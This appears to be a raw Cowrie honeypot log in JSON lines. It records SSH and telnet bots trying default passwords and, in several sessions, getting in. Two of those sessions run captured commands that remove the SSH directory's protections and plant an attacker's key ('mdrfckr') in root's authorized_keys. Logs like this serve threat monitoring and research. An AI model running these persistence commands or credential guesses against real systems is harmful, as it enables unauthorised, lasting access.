{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:47.023217Z","src_ip":"27.112.78.245","session":"be58541e7dfe"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:19:47.024910Z","src_ip":"27.112.78.245","session":"38519233ed90"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":54124,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc9f32ace74","protocol":"ssh","message":"New connection: 24.108.102.132:54124 (1.2.3.4:22) [session: adc9f32ace74]","sensor":"my-vps","timestamp":"2025-08-26T00:20:06.758050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:20:06.759919Z","src_ip":"24.108.102.132","session":"adc9f32ace74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:20:06.919948Z","src_ip":"24.108.102.132","session":"adc9f32ace74"}
{"eventid":"cowrie.login.failed","username":"liang","password":"123456","message":"login attempt [liang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:20:07.627581Z","src_ip":"24.108.102.132","session":"adc9f32ace74"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:20:08.794088Z","src_ip":"24.108.102.132","session":"adc9f32ace74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45636,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d16820533e3","protocol":"telnet","message":"New connection: 212.227.125.160:45636 (1.2.3.4:23) [session: 0d16820533e3]","sensor":"my-vps","timestamp":"2025-08-26T00:20:46.313300Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T00:20:47.958576Z","src_ip":"212.227.125.160","session":"0d16820533e3"}
{"eventid":"cowrie.session.closed","duration":4.011115312576294,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:20:50.324347Z","src_ip":"212.227.125.160","session":"0d16820533e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45652,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f4eab07df16","protocol":"telnet","message":"New connection: 212.227.125.160:45652 (1.2.3.4:23) [session: 3f4eab07df16]","sensor":"my-vps","timestamp":"2025-08-26T00:20:50.532030Z"}
{"eventid":"cowrie.session.closed","duration":5.186491250991821,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:20:55.718447Z","src_ip":"212.227.125.160","session":"3f4eab07df16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42236,"dst_ip":"1.2.3.4","dst_port":23,"session":"984856a166ef","protocol":"telnet","message":"New connection: 212.227.125.160:42236 (1.2.3.4:23) [session: 984856a166ef]","sensor":"my-vps","timestamp":"2025-08-26T00:20:55.880818Z"}
{"eventid":"cowrie.session.closed","duration":1.5156402587890625,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:20:57.396390Z","src_ip":"212.227.125.160","session":"984856a166ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42244,"dst_ip":"1.2.3.4","dst_port":23,"session":"5db09f200162","protocol":"telnet","message":"New connection: 212.227.125.160:42244 (1.2.3.4:23) [session: 5db09f200162]","sensor":"my-vps","timestamp":"2025-08-26T00:20:57.554695Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T00:20:58.141429Z","src_ip":"212.227.125.160","session":"5db09f200162"}
{"eventid":"cowrie.session.closed","duration":2.642428159713745,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:00.197032Z","src_ip":"212.227.125.160","session":"5db09f200162"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42258,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f86ce2840e1","protocol":"telnet","message":"New connection: 212.227.125.160:42258 (1.2.3.4:23) [session: 6f86ce2840e1]","sensor":"my-vps","timestamp":"2025-08-26T00:21:00.359086Z"}
{"eventid":"cowrie.session.closed","duration":1.4276647567749023,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:01.786713Z","src_ip":"212.227.125.160","session":"6f86ce2840e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42268,"dst_ip":"1.2.3.4","dst_port":23,"session":"3a99ba53121e","protocol":"telnet","message":"New connection: 212.227.125.160:42268 (1.2.3.4:23) [session: 3a99ba53121e]","sensor":"my-vps","timestamp":"2025-08-26T00:21:01.945266Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":36286,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd06ba1769e4","protocol":"ssh","message":"New connection: 27.112.78.245:36286 (1.2.3.4:22) [session: fd06ba1769e4]","sensor":"my-vps","timestamp":"2025-08-26T00:21:03.349884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:21:03.351035Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:21:03.627167Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.login.success","username":"root","password":"help","message":"login attempt [root/help] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:21:04.768296Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:21:05.381921Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:21:05.382916Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:21:05.384250Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:05.660162Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:21:06.226874Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.227570Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.session.closed","duration":4.348959684371948,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.294132Z","src_ip":"212.227.125.160","session":"3a99ba53121e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55074,"dst_ip":"1.2.3.4","dst_port":23,"session":"65089a126624","protocol":"telnet","message":"New connection: 212.227.125.160:55074 (1.2.3.4:23) [session: 65089a126624]","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.453828Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.504317Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.505158Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44410,"dst_ip":"1.2.3.4","dst_port":22,"session":"32c5c23826da","protocol":"ssh","message":"New connection: 27.112.78.245:44410 (1.2.3.4:22) [session: 32c5c23826da]","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.774424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.775732Z","src_ip":"27.112.78.245","session":"32c5c23826da"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T00:21:06.879064Z","src_ip":"212.227.125.160","session":"65089a126624"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:21:07.045481Z","src_ip":"27.112.78.245","session":"32c5c23826da"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:21:08.261475Z","src_ip":"27.112.78.245","session":"32c5c23826da"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T00:21:08.336870Z","src_ip":"212.227.125.160","session":"65089a126624"}
{"eventid":"cowrie.session.closed","duration":2.8362784385681152,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:09.290042Z","src_ip":"212.227.125.160","session":"65089a126624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55080,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ef912f301a7","protocol":"telnet","message":"New connection: 212.227.125.160:55080 (1.2.3.4:23) [session: 6ef912f301a7]","sensor":"my-vps","timestamp":"2025-08-26T00:21:09.451072Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:09.532360Z","src_ip":"27.112.78.245","session":"32c5c23826da"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44426,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e7792e82b9a","protocol":"ssh","message":"New connection: 27.112.78.245:44426 (1.2.3.4:22) [session: 2e7792e82b9a]","sensor":"my-vps","timestamp":"2025-08-26T00:21:09.803747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:21:09.804691Z","src_ip":"27.112.78.245","session":"2e7792e82b9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:21:10.080994Z","src_ip":"27.112.78.245","session":"2e7792e82b9a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:21:11.211363Z","src_ip":"27.112.78.245","session":"2e7792e82b9a"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:21:11.268089Z","src_ip":"212.227.125.160","session":"6ef912f301a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:21:11.319910Z","src_ip":"212.227.125.160","session":"6ef912f301a7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:11.485465Z","src_ip":"27.112.78.245","session":"2e7792e82b9a"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:11.487494Z","src_ip":"27.112.78.245","session":"fd06ba1769e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:12.823794Z","src_ip":"212.227.125.160","session":"6ef912f301a7"}
{"eventid":"cowrie.session.closed","duration":3.379138708114624,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:21:12.828883Z","src_ip":"212.227.125.160","session":"6ef912f301a7"}
{"eventid":"cowrie.session.connect","src_ip":"72.240.125.133","src_port":39884,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc101624852f","protocol":"ssh","message":"New connection: 72.240.125.133:39884 (1.2.3.4:22) [session: cc101624852f]","sensor":"my-vps","timestamp":"2025-08-26T00:22:16.141872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:16.143011Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:16.273135Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.login.success","username":"root","password":"amir123456","message":"login attempt [root/amir123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:22:16.816323Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:22:17.138615Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.139384Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.140492Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.269033Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:22:17.539836Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.540611Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.673380Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.674202Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.session.connect","src_ip":"72.240.125.133","src_port":40284,"dst_ip":"1.2.3.4","dst_port":22,"session":"d40ef14d4053","protocol":"ssh","message":"New connection: 72.240.125.133:40284 (1.2.3.4:22) [session: d40ef14d4053]","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.794173Z"}
